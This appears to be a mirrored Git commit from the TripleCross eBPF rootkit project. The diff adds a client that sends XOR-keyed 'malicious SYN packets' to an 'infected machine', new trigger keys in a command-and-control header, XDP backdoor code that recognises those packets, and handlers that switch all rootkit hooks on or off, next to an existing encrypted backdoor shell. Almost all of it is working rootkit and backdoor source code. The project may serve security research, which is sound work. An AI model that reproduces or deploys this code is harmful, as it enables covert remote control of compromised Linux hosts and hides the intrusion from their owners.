admin/TripleCross
1
0
Fork 0
mirror of https://github.com/h3xduck/TripleCross.git synced 2025-12-16 23:33:06 +08:00
Code Issues Packages Projects Releases Wiki Activity

Added new hidden packets, commands and rest of structure to activate and deactivate hooks from the backdoor

Browse Source
This commit is contained in:
h3xduck
2022-05-07 19:16:33 -04:00
parent ce7d36371d
commit 5746ac5efb
11 changed files with 1694 additions and 1406 deletions
Download Patch File Download Diff File Expand all files Collapse all files

BIN
src/.output/kit.o
View File

Binary file not shown.

2873
src/.output/kit.skel.h
View File

File diff suppressed because it is too large Load Diff

BIN
src/bin/kit
View File

Binary file not shown.

80
src/client/client.c
View File

@@ -188,7 +188,7 @@ void activate_command_control_shell(char* argv){
free(local_ip); free(local_ip);
} }
//Rootkit backdoor V2 //Rootkit backdoor V2 being used - Bvp47 like
void activate_command_control_shell_encrypted(char* argv){ void activate_command_control_shell_encrypted(char* argv){
char* local_ip = getLocalIpAddress(); char* local_ip = getLocalIpAddress();
printf("["KBLU"INFO"RESET"]""Victim IP selected: %s\n", argv); printf("["KBLU"INFO"RESET"]""Victim IP selected: %s\n", argv);
@@ -240,9 +240,61 @@ void activate_command_control_shell_encrypted(char* argv){
} }
server_run(8500); server_run(8500);
}
void hook_control_command(char* argv, int mode){
char* local_ip = getLocalIpAddress();
printf("["KBLU"INFO"RESET"]""Victim IP selected: %s\n", argv);
check_ip_address_format(argv);
printf("["KBLU"INFO"RESET"]""Crafting malicious SYN packet...\n");
//+1 since payload must finish with null character for parameter passing, although not sent in the actual packet payload
char payload[CC_TRIGGER_SYN_PACKET_PAYLOAD_SIZE+1] = {0};
srand(time(NULL));
for(int ii=0; ii<CC_TRIGGER_SYN_PACKET_PAYLOAD_SIZE; ii++){
payload[ii] = (char)rand();
}
//Follow protocol rules
char section[CC_TRIGGER_SYN_PACKET_SECTION_LEN];
char section2[CC_TRIGGER_SYN_PACKET_SECTION_LEN];
char key1[CC_TRIGGER_SYN_PACKET_SECTION_LEN+1] = CC_TRIGGER_SYN_PACKET_KEY_1;
char key2[CC_TRIGGER_SYN_PACKET_SECTION_LEN+1] = CC_TRIGGER_SYN_PACKET_KEY_2;
char key3[CC_TRIGGER_SYN_PACKET_SECTION_LEN+1];
//K3 with command to start the encrypted connection with the backdoor
if(mode == 0){
strncpy(key3, CC_TRIGGER_SYN_PACKET_KEY_3_HOOK_DEACTIVATE_ALL, CC_TRIGGER_SYN_PACKET_SECTION_LEN);
}else{
strncpy(key3, CC_TRIGGER_SYN_PACKET_KEY_3_HOOK_ACTIVATE_ALL, CC_TRIGGER_SYN_PACKET_SECTION_LEN);
}
char result[CC_TRIGGER_SYN_PACKET_SECTION_LEN];
strncpy(section, payload, CC_TRIGGER_SYN_PACKET_SECTION_LEN);
for(int ii=0; ii<CC_TRIGGER_SYN_PACKET_SECTION_LEN; ii++){
result[ii] = section[ii] ^ key1[ii];
}
strncpy(payload+0x06, result, CC_TRIGGER_SYN_PACKET_SECTION_LEN);
strncpy(section, payload+0x02, CC_TRIGGER_SYN_PACKET_SECTION_LEN);
for(int ii=0; ii<CC_TRIGGER_SYN_PACKET_SECTION_LEN; ii++){
result[ii] = section[ii] ^ key2[ii];
}
strncpy(payload+0x0A, result, CC_TRIGGER_SYN_PACKET_SECTION_LEN);
strncpy(section, payload+0x06, CC_TRIGGER_SYN_PACKET_SECTION_LEN);
strncpy(section2, payload+0x0A, CC_TRIGGER_SYN_PACKET_SECTION_LEN);
for(int ii=0; ii<CC_TRIGGER_SYN_PACKET_SECTION_LEN; ii++){
result[ii] = section[ii] ^ section2[ii] ^ key3[ii];
}
strncpy(payload+0x0C, result, CC_TRIGGER_SYN_PACKET_SECTION_LEN);
packet_t packet = build_standard_packet(8000, 9000, local_ip, argv, 4096, payload);
printf("["KBLU"INFO"RESET"]""Sending malicious packet to infected machine...\n");
//Sending the malicious payload
if(rawsocket_send(packet)<0){
printf("["KRED"ERROR"RESET"]""An error occured. Is the machine up?\n");
return;
}else{
printf("["KGRN"OK"RESET"]""Secret message successfully sent! No answer expected\n");
}
} }
@@ -264,7 +316,7 @@ void main(int argc, char* argv[]){
char path_arg[512]; char path_arg[512];
//Command line argument parsing //Command line argument parsing
while ((opt = getopt(argc, argv, ":S:c:e:h")) != -1) { while ((opt = getopt(argc, argv, ":S:c:e:u:a:h")) != -1) {
switch (opt) { switch (opt) {
case 'S': case 'S':
print_welcome_message(); print_welcome_message();
@@ -298,6 +350,28 @@ void main(int argc, char* argv[]){
activate_command_control_shell_encrypted(dest_address); activate_command_control_shell_encrypted(dest_address);
PARAM_MODULE_ACTIVATED = 1; PARAM_MODULE_ACTIVATED = 1;
break;
case 'u':
print_welcome_message();
sleep(1);
//Send a secret message
printf("["KBLU"INFO"RESET"]""Deactivating all rootkit hooks\n");
//printf("Option S has argument %s\n", optarg);
strcpy(dest_address, optarg);
hook_control_command(dest_address, 0);
PARAM_MODULE_ACTIVATED = 1;
break;
case 'a':
print_welcome_message();
sleep(1);
//Send a secret message
printf("["KBLU"INFO"RESET"]""Activating all rootkit hooks\n");
//printf("Option S has argument %s\n", optarg);
strcpy(dest_address, optarg);
hook_control_command(dest_address, 1);
PARAM_MODULE_ACTIVATED = 1;
break; break;
/*case 'u': /*case 'u':
print_welcome_message(); print_welcome_message();

BIN
src/client/client.o
View File

Binary file not shown.

BIN
src/client/injector
View File

Binary file not shown.

4
src/common/c&c.h
View File

@@ -17,9 +17,13 @@
#define CC_TRIGGER_SYN_PACKET_KEY_1 "\x56\xA4" #define CC_TRIGGER_SYN_PACKET_KEY_1 "\x56\xA4"
#define CC_TRIGGER_SYN_PACKET_KEY_2 "\x78\x13" #define CC_TRIGGER_SYN_PACKET_KEY_2 "\x78\x13"
#define CC_TRIGGER_SYN_PACKET_KEY_3_ENCRYPTED_SHELL "\x1F\x29" #define CC_TRIGGER_SYN_PACKET_KEY_3_ENCRYPTED_SHELL "\x1F\x29"
#define CC_TRIGGER_SYN_PACKET_KEY_3_HOOK_ACTIVATE_ALL "\x1D\x25"
#define CC_TRIGGER_SYN_PACKET_KEY_3_HOOK_DEACTIVATE_ALL "\x1D\x24"
#define CC_TRIGGER_SYN_PACKET_SECTION_LEN 0x02 #define CC_TRIGGER_SYN_PACKET_SECTION_LEN 0x02
#define CC_PROT_COMMAND_ENCRYPTED_SHELL 0 #define CC_PROT_COMMAND_ENCRYPTED_SHELL 0
#define CC_PROT_COMMAND_HOOK_ACTIVATE_ALL 1
#define CC_PROT_COMMAND_HOOK_DEACTIVATE_ALL 2
//C&C V3 -- Distributed hidden payload in packet stream //C&C V3 -- Distributed hidden payload in packet stream
struct trigger_t { struct trigger_t {

50
src/ebpf/include/xdp/backdoor.h
View File

@@ -55,6 +55,10 @@ static __always_inline int manage_backdoor_trigger_v1(char* payload, __u32 paylo
__builtin_memcpy(section3, payload+0x0C, CC_TRIGGER_SYN_PACKET_SECTION_LEN); __builtin_memcpy(section3, payload+0x0C, CC_TRIGGER_SYN_PACKET_SECTION_LEN);
int correct = 1; int correct = 1;
int command_received = -1; int command_received = -1;
//Checking for a valid K3, which indicates the command sent by the backdoor client
//Not the cleanest code, needs refactoring
//Encrypted shell request
__builtin_memcpy(key3, CC_TRIGGER_SYN_PACKET_KEY_3_ENCRYPTED_SHELL, CC_TRIGGER_SYN_PACKET_SECTION_LEN); __builtin_memcpy(key3, CC_TRIGGER_SYN_PACKET_KEY_3_ENCRYPTED_SHELL, CC_TRIGGER_SYN_PACKET_SECTION_LEN);
for(int ii=0; ii<CC_TRIGGER_SYN_PACKET_SECTION_LEN; ii++){ for(int ii=0; ii<CC_TRIGGER_SYN_PACKET_SECTION_LEN; ii++){
result3[ii] = section[ii] ^ section2[ii] ^ section3[ii]; result3[ii] = section[ii] ^ section2[ii] ^ section3[ii];
@@ -65,7 +69,43 @@ static __always_inline int manage_backdoor_trigger_v1(char* payload, __u32 paylo
if(correct == 1){ if(correct == 1){
//Found valid k3 value //Found valid k3 value
command_received = CC_PROT_COMMAND_ENCRYPTED_SHELL; command_received = CC_PROT_COMMAND_ENCRYPTED_SHELL;
}else{ goto backdoor_finish;
}
correct = 1;
//Hook activate all request
__builtin_memcpy(key3, CC_TRIGGER_SYN_PACKET_KEY_3_HOOK_ACTIVATE_ALL, CC_TRIGGER_SYN_PACKET_SECTION_LEN);
for(int ii=0; ii<CC_TRIGGER_SYN_PACKET_SECTION_LEN; ii++){
result3[ii] = section[ii] ^ section2[ii] ^ section3[ii];
if(result3[ii]!=(key3[ii])){
correct = 0;
}
}
if(correct == 1){
//Found valid k3 value
command_received = CC_PROT_COMMAND_HOOK_ACTIVATE_ALL;
goto backdoor_finish;
}
correct = 1;
//Hook deactivate all request
__builtin_memcpy(key3, CC_TRIGGER_SYN_PACKET_KEY_3_HOOK_DEACTIVATE_ALL, CC_TRIGGER_SYN_PACKET_SECTION_LEN);
for(int ii=0; ii<CC_TRIGGER_SYN_PACKET_SECTION_LEN; ii++){
result3[ii] = section[ii] ^ section2[ii] ^ section3[ii];
if(result3[ii]!=(key3[ii])){
correct = 0;
}
}
if(correct == 1){
//Found valid k3 value
command_received = CC_PROT_COMMAND_HOOK_DEACTIVATE_ALL;
goto backdoor_finish;
}
backdoor_finish:
//Found no valid key 3
if(correct==0){
bpf_printk("FAIL CHECK 3\n"); bpf_printk("FAIL CHECK 3\n");
return XDP_PASS; return XDP_PASS;
} }
@@ -78,6 +118,14 @@ static __always_inline int manage_backdoor_trigger_v1(char* payload, __u32 paylo
bpf_printk("Received request to start encrypted connection\n"); bpf_printk("Received request to start encrypted connection\n");
ring_buffer_send_backdoor_command(&rb_comm, pid, command_received); ring_buffer_send_backdoor_command(&rb_comm, pid, command_received);
break; break;
case CC_PROT_COMMAND_HOOK_ACTIVATE_ALL:
bpf_printk("Received request to activate all hooks\n");
ring_buffer_send_backdoor_command(&rb_comm, pid, command_received);
break;
case CC_PROT_COMMAND_HOOK_DEACTIVATE_ALL:
bpf_printk("Received request to deactivate all hooks\n");
ring_buffer_send_backdoor_command(&rb_comm, pid, command_received);
break;
default: default:
bpf_printk("Command received unknown: %d\n", command_received); bpf_printk("Command received unknown: %d\n", command_received);
} }

56
src/user/include/modules/module_manager.c
View File

@@ -81,3 +81,59 @@ int setup_all_modules(){
return 0; return 0;
} }
int activate_all_modules_config(){
//XDP
module_config.xdp_module.all = ON;
//SCHED
module_config.sched_module.all = ON;
//FS (File system)
module_config.fs_module.all = ON;
//EXEC
module_config.exec_module.all = ON;
return 0;
}
int deactivate_all_modules_config(){
//XDP
module_config.xdp_module.all = OFF;
//SCHED
module_config.sched_module.all = OFF;
//FS (File system)
module_config.fs_module.all = OFF;
//EXEC
module_config.exec_module.all = OFF;
return 0;
}
int unhook_all_modules(){
//Alias
module_config_attr_t attr = module_config_attr;
int ret;
//XDP
ret = detach_xdp_all(attr.skel);
if(ret!=0) return -1;
//SCHED
ret = detach_sched_all(attr.skel);
if(ret!=0) return -1;
//FS (File system)
ret = detach_fs_all(attr.skel);
if(ret!=0) return -1;
//EXEC
detach_exec_all(attr.skel);
if(ret!=0) return -1;
return 0;
}

22
src/user/include/modules/module_manager.h
View File

@@ -71,4 +71,26 @@ extern module_config_attr_t module_config_attr;
*/ */
int setup_all_modules(); int setup_all_modules();
/**
* @brief Removes all hooks, independently on the module_config.
* Useful for reloading the modules.
*
* @return 0 if ok, -1 if error
*/
int unhook_all_modules();
/**
* @brief Sets the module_config with all hooks activated
*
* @return 0 if ok, -1 if error
*/
int activate_all_modules_config();
/**
* @brief Sets the module_config with all hooks deactivated
*
* @return 0 if ok, -1 if error
*/
int deactivate_all_modules_config();
#endif #endif

15
src/user/kit.c
View File

@@ -91,6 +91,7 @@ static int handle_rb_event(void *ctx, void *data, size_t data_size){
//For time displaying //For time displaying
struct tm *tm; struct tm *tm;
char ts[32]; char ts[32];
int ret;
time_t t; time_t t;
time(&t); time(&t);
tm = localtime(&t); tm = localtime(&t);
@@ -112,6 +113,20 @@ static int handle_rb_event(void *ctx, void *data, size_t data_size){
//TODO EXTRACT IP FROM KERNEL BUFFER //TODO EXTRACT IP FROM KERNEL BUFFER
printf("Starting encrypted connection\n"); printf("Starting encrypted connection\n");
client_run("127.0.1.1", 8500); client_run("127.0.1.1", 8500);
break;
case CC_PROT_COMMAND_HOOK_ACTIVATE_ALL:
printf("Activating all hooks as requested\n");
activate_all_modules_config();
ret = unhook_all_modules();
if(ret<0) printf("Failed to complete command: unhook all\n");
ret = setup_all_modules();
if(ret<0) printf("Failed to complete command: setup modules\n");
break;
case CC_PROT_COMMAND_HOOK_DEACTIVATE_ALL:
printf("Deactivating all hooks as requested\n");
deactivate_all_modules_config();
ret = unhook_all_modules();
if(ret<0) printf("Failed to complete command: unhook all\n");
break; break;
default: default:
printf("Command received unknown: %d\n", e->code); printf("Command received unknown: %d\n", e->code);